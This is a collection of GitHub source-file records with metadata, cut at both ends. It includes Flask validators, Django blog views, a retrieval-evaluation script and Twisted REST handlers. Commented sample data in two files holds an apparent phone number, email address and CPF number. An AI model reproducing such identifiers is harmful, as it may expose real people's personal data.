"py", "file_size_in_byte": 3037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.mixer.init", "line_number": 8, 
"usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.Tk", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 31, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.fadeout", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.pause", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 45, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.unpause", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 52, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 59, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pyaudio.PyAudio", "line_number": 64, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 68, "usage_type": "call"}, {"api_name": "pyaudio.paInt16", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pyaudio.paInt16", "line_number": 74, "usage_type": "attribute"}, {"api_name": "wave.open", "line_number": 84, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 100, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 104, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 105, "usage_type": "attribute"}]}
+{"seq_id": "35092651827", "text": "\nfrom datetime import datetime as dt\nfrom functools import wraps\nfrom flask import request\n\ndef check(conf_schema, conf):\n try:\n conf_schema.validate(conf)\n return True,\"\"\n except SchemaError as a:\n return False,a.code\n\ndef IS_STR_DATE(format):\n def fnc(date_text):\n try:\n dt.strptime(date_text, format)\n return True\n except ValueError:\n raise SchemaError(f\"date format is invalid! value:('{date_text}')\")\n return fnc\n\ndef LEN_H_THEN(l):\n def LEN_H_THEN(x):\n if not len(x) > l:\n raise SchemaError(f\"value ('{x}') doesn't have the apropriate length!\")\n else: \n return True\n return LEN_H_THEN\n\ndef VALIDCPF(number):\n # Obtém os números do CPF e ignora outros caracteres\n cpf = [int(char) for char in number if char.isdigit()]\n\n # Verifica se o CPF tem 11 dígitos\n if len(cpf) != 11:\n raise SchemaError(f\"value ('{number}') doesn't have the apropriate length!\")\n\n # Verifica se o CPF tem todos os números iguais, ex: 111.111.111-11\n # Esses CPFs são considerados inválidos mas passam na validação dos dígitos\n # Antigo código para referência: if all(cpf[i] == cpf[i+1] for i in range (0, len(cpf)-1))\n if cpf == cpf[::-1]:\n raise SchemaError(f\"value ('{number}') is not a valid CPF number!\")\n\n # Valida os dois dígitos verificadores\n for i in range(9, 11):\n value = sum((cpf[num] * ((i+1) - num) for num in range(0, i)))\n digit = ((value * 10) % 11) % 10\n if digit != cpf[i]:\n raise SchemaError(f\"value ('{number}') is not a valid CPF number!\")\n return True\n\ndef TO_DATE(format):\n def fnc(date_text):\n try:\n return dt.strptime(date_text, format)\n except ValueError:\n raise SchemaError(f\"date format is invalid! value:('{date_text}')\")\n return fnc\n\ndef GETDATA():\n try:\n xstr = lambda s: s or \"\"\n contentJson = \"json\" in xstr(request.headers.get(\"Content-Type\"))\n if request.method == \"GET\":\n fields = request.args.to_dict()\n elif request.method in [\"POST\",\"PUT\",\"DELETE\",\"DEL\",\"CREDIT\"]:\n data = request.get_json(force=True) or request.get_json() or request.form.to_dict()\n fields = request.json if contentJson else data\n return True,fields\n except:\n return False,\"\"\n\ndef schema_required(schema,methods=\"*\",out=\"fields\"):\n def decorator(function):\n @wraps(function)\n def wrapper(*args, **kwargs):\n \n\n if methods == \"*\" or request.method in methods:\n fields = GETDATA()\n if not fields[0]:return \"json data required!\",400\n fields = fields[1]\n \n try:\n fields = schema.validate(fields)\n except SchemaError as a:\n return a.code,400\n \n kwargs[out] = fields\n result = function(*args, **kwargs)\n return result\n else:\n kwargs[out] = []\n return function(*args, **kwargs)\n\n return wrapper\n return decorator\n\n# conf = {\n# \"nome\": \"a\",\n# \"cpf\": \"08639614440\",\n# \"dataNascimento\":\"01/01/1991\",\n# \"conta\":{\n# \"limiteSaqueDiario\":0,\n# \"flagAtivo\":True,\n# \"tipoConta\":1\n# }\n# }\n\n#print(check(conf_schema, conf))\n\n", "repo_name": "melquelima/ApiTransacaoBancaria", "sub_path": "app/models/tools/required.py", "file_name": "required.py", "file_ext": "py", "file_size_in_byte": 3458, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 55, "usage_type": "call"}, {"api_name": 
"datetime.datetime", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.args.to_dict", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.request.form.to_dict", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 68, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 79, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "39358443065", "text": "import json\nfrom pygame.locals import Rect\n\nfrom src.pathList import CONFIG_PATH\nfrom src.logs import Logs\n\nclass Config(object):\n def __init__(self):\n super().__init__()\n\n self.logs = Logs() # Funtion logs\n\n self.path = CONFIG_PATH # config path\n self.data = {} # data (null)\n\n self.rect = Rect(0, 0, 960, 540)\n\n @property\n def parse(self):\n #=== parse data ===#\n return self.data\n\n @property\n def getVersion(self):\n try:\n return str(self.data[\"informations\"][\"version\"])\n except KeyError:\n self.logs.error(\"Tidak dapat mengambil data!\", keluar=True)\n\n @property\n def getName(self):\n try:\n return self.data[\"informations\"][\"name\"]\n except KeyError:\n self.logs.error(\"Tidak dapat mengambil data!\", keluar=True)\n\n @property\n def getInformation(self):\n #=== get information from config ===#\n try:\n return self.data[\"informations\"]\n except KeyError:\n self.logs.error(\"Tidak dapat mengambil data!\", keluar=True)\n\n @property\n def getRect(self):\n return self.rect\n\n def read(self):\n #==== membaca config ====#\n try:\n buka = open(self.path, \"r\").read()\n self.data = json.loads(buka)\n return True\n except IOError:\n self.logs.error(\"Tidak dapat membuka config!\", keluar=True)\n return False", "repo_name": "billalxcode/PocongRunner", "sub_path": "src/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1463, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "src.logs.Logs", "line_number": 11, "usage_type": "call"}, {"api_name": "src.pathList.CONFIG_PATH", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.locals.Rect", "line_number": 16, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "39480746712", "text": "from django.shortcuts import render, redirect, reverse\nfrom django.views.decorators.csrf import ensure_csrf_cookie\nfrom .models import Category, Article, Comment\nfrom utils import restful\nfrom .serializer import CommentSerializers\nfrom utils.decorators import blog_login_required\n\n\n# Create your views here.\n@ensure_csrf_cookie\ndef index(request):\n categories = Category.objects.all()\n articles = Article.objects.all()\n context = {\n 'categories': categories,\n 'articles': articles\n }\n return render(request, 'index.html', context=context)\n\n\ndef article_detail(request, article_id):\n print(article_id)\n article = Article.objects.select_related('author', 'category').prefetch_related('comment_set').get(pk=article_id)\n categories = Category.objects.all()\n context = {\n 'article': article,\n 'categories': categories,\n }\n return render(request, 'article_detail.html', context=context)\n\n\n@blog_login_required\ndef comment(request):\n try:\n content = request.POST.get('content')\n pk = request.POST.get('pk')\n article = Article.objects.get(pk=pk)\n comment = Comment.objects.create(content=content, author=request.user, article=article)\n serializer = CommentSerializers(comment)\n print(serializer)\n print(\"+++++++\")\n data = serializer.data\n # data 为字典\n return restful.result(data=data)\n\n except:\n return restful.params_error(message='评论格式错误')\n\n# data = {'pub_time': '2020-03-30T23:46:39.605343+08:00', 'content': '1', 'id': 68, 'author': OrderedDict(\n# [('uuid', 'meDCdoFbj52oQX7rvaeic8'), ('telephone', '13938499083'), ('username', '王涛'), ('is_staff', True),\n# ('email', '1769710004@qq.com'), ('is_active', True)])}\n\n", "repo_name": "wang-tao182/my_blog", "sub_path": "apps/blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.Category.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Article.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 13, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.ensure_csrf_cookie", "line_number": 10, "usage_type": "name"}, {"api_name": "models.Article.objects.select_related", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 24, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Article.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 37, "usage_type": "name"}, {"api_name": "models.Comment.objects.create", "line_number": 38, "usage_type": "call"}, 
{"api_name": "models.Comment.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Comment", "line_number": 38, "usage_type": "name"}, {"api_name": "serializer.CommentSerializers", "line_number": 39, "usage_type": "call"}, {"api_name": "serializer.data", "line_number": 42, "usage_type": "attribute"}, {"api_name": "utils.restful.result", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.restful", "line_number": 44, "usage_type": "name"}, {"api_name": "utils.restful.params_error", "line_number": 47, "usage_type": "call"}, {"api_name": "utils.restful", "line_number": 47, "usage_type": "name"}, {"api_name": "utils.decorators.blog_login_required", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "33413750307", "text": "import sys\nimport plotly.graph_objs as graph_objs\nfrom plotly.offline import plot\n\n\n# evaluates the given rankings for a retrieval model according to the given relevance judgements\ndef evaluate():\n # get file names from user\n relevance_reference_path = input(\"Please enter the full path of the relevance reference file: \").split()[0]\n model_rankings_path = input(\"Please enter the full path of the model rankings file: \").split()[0]\n start = model_rankings_path.rfind(\"/\") + 1\n stop = model_rankings_path.rfind(\".\")\n model_rankings_identifier = model_rankings_path[start:stop]\n\n # get relevance reference and model rankings from files\n relevance_reference = get_relevance_reference(relevance_reference_path)\n relevant_doc_counts = get_relevant_doc_counts(relevance_reference)\n model_rankings = get_model_rankings_and_name(model_rankings_path)\n relevant_rankings = get_relevant_rankings(relevance_reference, model_rankings)\n\n # run algorithms, accumulating output along the way\n output = mean_average_precision(relevant_rankings, model_rankings_identifier)\n output += mean_reciprocal_rank(relevant_rankings, model_rankings_identifier)\n output += precision_at_k(relevant_rankings, 5, model_rankings_identifier)\n output += precision_at_k(relevant_rankings, 20, model_rankings_identifier)\n output += recall_and_precision(relevant_rankings, model_rankings_identifier, relevant_doc_counts)\n\n # write output to file\n output_file = open(\"{0}_eval.txt\".format(model_rankings_identifier), \"w\")\n output_file.write(output)\n output_file.close()\n\n return\n\n\n# returns a dictionary that maps query_id to a list of relevant doc_ids\ndef get_relevance_reference(relevance_reference_filename):\n relevance_reference_file = open(relevance_reference_filename, \"r\")\n lines = relevance_reference_file.readlines()\n relevancy_mapping = {}\n\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n tokens = line.split()\n query_id = tokens[0]\n doc_id = tokens[2]\n\n if query_id not in relevancy_mapping:\n relevancy_mapping[query_id] = [doc_id]\n else:\n relevancy_mapping[query_id].append(doc_id)\n\n return relevancy_mapping\n\n\n# returns a dictionary that maps query_id to relevant doc counts\ndef get_relevant_doc_counts(relevance_reference):\n doc_counts = {}\n\n for q in relevance_reference:\n doc_counts[q] = len(relevance_reference[q])\n\n return doc_counts\n\n\n# returns a dictionary that maps query_id to a list of {doc_id: rank} dictionaries\n# and the of the retrieval model used to generate these rankings\ndef get_model_rankings_and_name(model_rankings_filename):\n model_rankings_file = open(model_rankings_filename, \"r\")\n lines = model_rankings_file.readlines()\n model_rankings = {}\n\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n tokens = line.split()\n query_id = tokens[0]\n doc_id = tokens[2]\n rank = tokens[3]\n\n if query_id not in model_rankings:\n doc_to_rank = {}\n doc_to_rank[doc_id] = rank\n model_rankings[query_id] = doc_to_rank\n else:\n model_rankings[query_id][doc_id] = rank\n\n return model_rankings\n\n\n# returns a dictionary that maps query_id to a list of ranks of relevant documents\ndef get_relevant_rankings(relevance_reference, model_rankings):\n relevant_rankings = {}\n\n for q in relevance_reference.keys():\n query_rankings = model_rankings[q]\n rankings_list = []\n\n for d in relevance_reference[q]:\n if d in query_rankings:\n rankings_list.append(int(query_rankings[d]))\n\n relevant_rankings[q] = 
rankings_list\n\n return relevant_rankings\n\n\n# returns a string that documents the mean average precision for given relevant rankings\ndef mean_average_precision(relevant_rankings, model_identifier):\n avg_precision_accumulator = 0\n\n for q in relevant_rankings.keys():\n avg_precision_accumulator += get_avg_precision(relevant_rankings[q])\n\n mean_avg_precision = avg_precision_accumulator / len(relevant_rankings)\n\n return \"The mean average precision for the {0} model is {1}.\\n\\n\".format(model_identifier, mean_avg_precision)\n\n\n# returns the average precision of the given relevant rankings\ndef get_avg_precision(relevant_ranks):\n i = 0\n precision_accumulator = 0\n\n while i < len(relevant_ranks):\n precision_accumulator += (i + 1) / relevant_ranks[i]\n i += 1\n\n return precision_accumulator / len(relevant_ranks)\n\n\n# returns a string that documents the mean reciprocal rank for the given relevant rankings\ndef mean_reciprocal_rank(relevant_rankings, model_identifier):\n reciprocal_rank_accumulator = 0\n\n for q in relevant_rankings.keys():\n reciprocal_rank_accumulator += get_reciprocal_rank(relevant_rankings[q])\n\n mean_rec_rank = reciprocal_rank_accumulator / len(relevant_rankings)\n\n return \"The mean reciprocal rank for the {0} model is {1}.\\n\\n\".format(model_identifier, mean_rec_rank)\n\n\n# returns the reciprocal rank of the given relevant rankings\ndef get_reciprocal_rank(relevant_ranks):\n first_relevant_rank = min(relevant_ranks)\n\n return 1 / first_relevant_rank\n\n\n# returns a string that documents the precision at rank k for the given relevant rankings\ndef precision_at_k(relevant_rankings, k, model_identifier):\n precision_accumulator = 0\n output = \"\"\n\n for q in relevant_rankings.keys():\n ranks = relevant_rankings[q]\n i = 0\n\n while i < len(ranks):\n if ranks[i] > k:\n prec_at_k = i / k\n precision_accumulator += prec_at_k\n output += \"Precision at rank {0} for query \\\"{1}\\\" in model {2} is {3}.\\n\".format(k, q, model_identifier, prec_at_k)\n break\n elif ranks[i] == k:\n prec_at_k = (i + 1) / k\n precision_accumulator += prec_at_k\n output += \"Precision at rank {0} for query \\\"{1}\\\" in model {2} is {3}.\\n\".format(k, q, model_identifier, prec_at_k)\n break\n else:\n i += 1\n\n if i >= len(ranks):\n prec_at_k = i / k\n precision_accumulator += prec_at_k\n output += \"Precision at rank {0} for query \\\"{1}\\\" in model {2} is {3}.\\n\".format(k, q, model_identifier, prec_at_k)\n\n output += \"\\n\"\n return output\n\n\n# returns a string that represents a recall-precision table for each query from the given relevant rankings\n# also creates an html Recall-Precision Graph for these queries\ndef recall_and_precision(relevant_rankings, model_identifier, relevant_doc_counts):\n output = \"\"\n max_recall_rank = 0\n\n for q in relevant_rankings:\n if relevant_rankings[q][-1] > max_recall_rank:\n max_recall_rank = relevant_rankings[q][-1]\n\n data = []\n\n for q in relevant_rankings.keys():\n relevant_ranks = relevant_rankings[q]\n relevant_docs = relevant_doc_counts[q]\n output += \"Recall vs. 
Precision table for query {0} with model {1}.\\n\".format(q, model_identifier)\n ranks = [i + 1 for i in range(max_recall_rank)]\n r = []\n p = []\n hits = 0\n\n for i in ranks:\n if i in relevant_ranks:\n hits += 1\n recall = hits / relevant_docs\n precision = hits / i\n r.append(recall)\n p.append(precision)\n\n output += \"rank\\t\".format()\n\n for i in ranks[:-1]:\n output += \"{0}\\t\".format(i)\n\n output += \"{0}\\nrecall\\t\".format(ranks[-1])\n\n for x in r[:-1]:\n output += \"{0}\\t\".format(x)\n\n output += \"{0}\\nprecision\\t\".format(r[-1])\n\n for y in p[:-1]:\n output += \"{0}\\t\".format(y)\n\n output += \"{0}\\n\\n\".format(p[-1])\n\n data.append(graph_objs.Scatter(x=r, y=p, name=\"Query {0}\".format(q)))\n\n # strategy for graph layout from the plotly documentation: https://plot.ly/python/figure-labels/\n layout = graph_objs.Layout(\n title=graph_objs.layout.Title(\n text=\"Recall vs. Precision for Model {0}\".format(model_identifier),\n xref=\"paper\",\n x=0\n ),\n xaxis=graph_objs.layout.XAxis(\n title=graph_objs.layout.xaxis.Title(\n text=\"Recall\",\n font=dict(\n family=\"Courier New, monospace\",\n size=18,\n color=\"#7f7f7f\"\n )\n )\n ),\n yaxis=graph_objs.layout.YAxis(\n title=graph_objs.layout.yaxis.Title(\n text=\"Precision\",\n font=dict(\n family=\"Courier New, monospace\",\n size=18,\n color=\"#7f7f7f\"\n )\n )\n )\n )\n\n figure = graph_objs.Figure(data=data, layout=layout)\n plot(figure, filename=\"recall_vs_precision_for_model_{0}.html\".format(model_identifier))\n\n return output\n\n\nif __name__ == \"__main__\":\n sys.tracebacklimit = 0\n evaluate()\n", "repo_name": "ankur-bambharoliya/Toy-search-engine", "sub_path": "python/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 9080, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "plotly.graph_objs.Scatter", "line_number": 228, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 228, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 231, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 231, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.Title", "line_number": 232, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 232, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 232, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.XAxis", "line_number": 237, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 237, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 237, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.xaxis.Title", "line_number": 238, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 238, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 238, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.YAxis", "line_number": 247, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 247, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 247, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.yaxis.Title", "line_number": 248, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 248, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 248, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", 
"line_number": 259, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 259, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 260, "usage_type": "call"}, {"api_name": "sys.tracebacklimit", "line_number": 266, "usage_type": "attribute"}]}
+{"seq_id": "70000723367", "text": "import time\nfrom flask import Flask\nfrom flask import jsonify, request, make_response\nimport profileclient\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/time')\ndef get_current_time():\n return {'time': time.time()}\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n # json_data is a dict with string key/val pairs\n # keys: inputValue\n # predictionValue\n # graphSelected\n # functionSelected\n json_data = request.get_json()\n # profiling_data = profileclient.Profiler().testProfile(int(json_data['functionSelected']), int(json_data['inputValue']))\n input = json_data['inputValue']\n prediction = json_data['predictionValue']\n mock_return_obj = {\n \"points\": [\n [1,1],\n [2,2],\n [3,3],\n [4,4],\n [5,5]\n ],\n \"n\": input,\n \"m\": prediction\n }\n return jsonify(status=200, data=mock_return_obj)\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "austincho/PerformanceVisualization", "sub_path": "production/PerformanceVisualization/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "21687114881", "text": "\"\"\"\r\n.. py:module:: environments_handler\r\n :synopsis: rest handler for environments interaction.\r\n\"\"\"\r\nimport logging\r\nfrom twisted.internet import reactor, defer\r\nfrom twisted.web.resource import Resource,NoResource\r\nfrom twisted.web import resource, http\r\nfrom twisted.python import log,failure\r\nfrom twisted.python.log import PythonLoggingObserver\r\nfrom twisted.web.server import NOT_DONE_YET\r\nfrom twisted.internet.task import deferLater\r\n\r\nfrom pollapli.core.interface.rest.handlers.default_rest_handler import DefaultRestHandler\r\nfrom pollapli.core.interface.rest.request_parser import RequestParser\r\nfrom pollapli.core.interface.rest.response_generator import ResponseGenerator\r\nfrom pollapli.core.interface.rest.handlers.driver_handlers import DriverHandler\r\n\r\nclass NodesHandler(DefaultRestHandler):\r\n \"\"\"\r\n Resource in charge of handling the nodes (plural) so :\r\n Adding a new node\r\n Listing all nodes\r\n etc\r\n \"\"\"\r\n isLeaf=False\r\n def __init__(self,rootUri=\"\",environmentManager=None,envId=None):\r\n DefaultRestHandler.__init__(self,rootUri)\r\n self.environmentManager=environmentManager\r\n \r\n self.envId=envId\r\n self.valid_contentTypes.append(\"application/pollapli.nodeList+json\") \r\n self.validGetParams.append('id')\r\n self.validGetParams.append('type')\r\n\r\n \r\n def getChild(self, id, request):\r\n try:\r\n return NodeHandler(self.rootUri+\"/\"+str(id),self.environmentManager,self.envId,int(id)) \r\n except ValueError :\r\n return NoResource()\r\n \r\n \r\n def render_POST(self,request): \r\n \"\"\"\r\n Handler for POST requests of nodes\r\n extract the data from the request body to add a new node\r\n \"\"\" \r\n r=ResponseGenerator(request,status=201,contentType=\"application/pollapli.node+json\",resource=\"node\",rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).add_node(**params),errback=r._build_response) \r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET\r\n \r\n def render_GET(self, request):\r\n \"\"\"\r\n Handler for GET requests of nodes\r\n \"\"\"\r\n r=ResponseGenerator(request,status=200,contentType=\"application/pollapli.nodeList+json\",resource=\"nodes\",rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).get_nodes(params),errback=r._build_response)\r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET\r\n \r\n \r\n def render_DELETE(self,request):\r\n \"\"\" \r\n Handler for DELETE requests of nodes\r\n WARNING !! 
needs to be used very carefully, with confirmation on the client side, as it deletes ALL\r\n nodes\r\n \"\"\"\r\n print(\"NODE CLEARING\")\r\n r=ResponseGenerator(request,contentType=\"application/pollapli.nodeList+json\",status=200,rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).clear_nodes() ,errback=r._build_response) \r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET \r\n \r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \r\nSingle node rest handler\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\nclass NodeHandler(DefaultRestHandler):\r\n isLeaf=False\r\n def __init__(self,rootUri=\"\",environmentManager=None,envId=None,nodeId=None):\r\n DefaultRestHandler.__init__(self,rootUri)\r\n self.logger=log.PythonLoggingObserver(\"dobozweb.core.server.rest.nodeHandler\")\r\n self.environmentManager=environmentManager\r\n self.envId=envId \r\n self.nodeId=nodeId\r\n self.valid_contentTypes.append(\"application/pollapli.node+json\") \r\n subPath=self.rootUri+\"/driver\"\r\n self.putChild(\"driver\",DriverHandler(subPath,self.environmentManager,self.envId,self.nodeId) \r\n)\r\n \r\n def render_GET(self, request):\r\n \"\"\"\r\n Handler for GET requests of node\r\n \"\"\" \r\n r=ResponseGenerator(request,status=200,contentType=\"application/pollapli.node+json\",resource=\"node\",rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams()\r\n d.addCallbacks(lambda params:self.environmentManager.get_environment(self.envId).get_node(self.nodeId),errback=r._build_response)\r\n d.addBoth(r._build_response) \r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET\r\n \r\n def render_PUT(self,request):\r\n \"\"\"\r\n Handler for PUT requests of node\r\n \"\"\"\r\n r=ResponseGenerator(request,status=200,contentType=\"application/pollapli.node+json\",resource=\"node\",rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n #d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).update_node(id=self.nodeId,**params),errback=r._build_response) \r\n d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).update_node(**params),errback=r._build_response) \r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET\r\n \r\n def render_DELETE(self,request):\r\n \"\"\" \r\n Handler for DELETE requests for the current node\r\n WARNING !! 
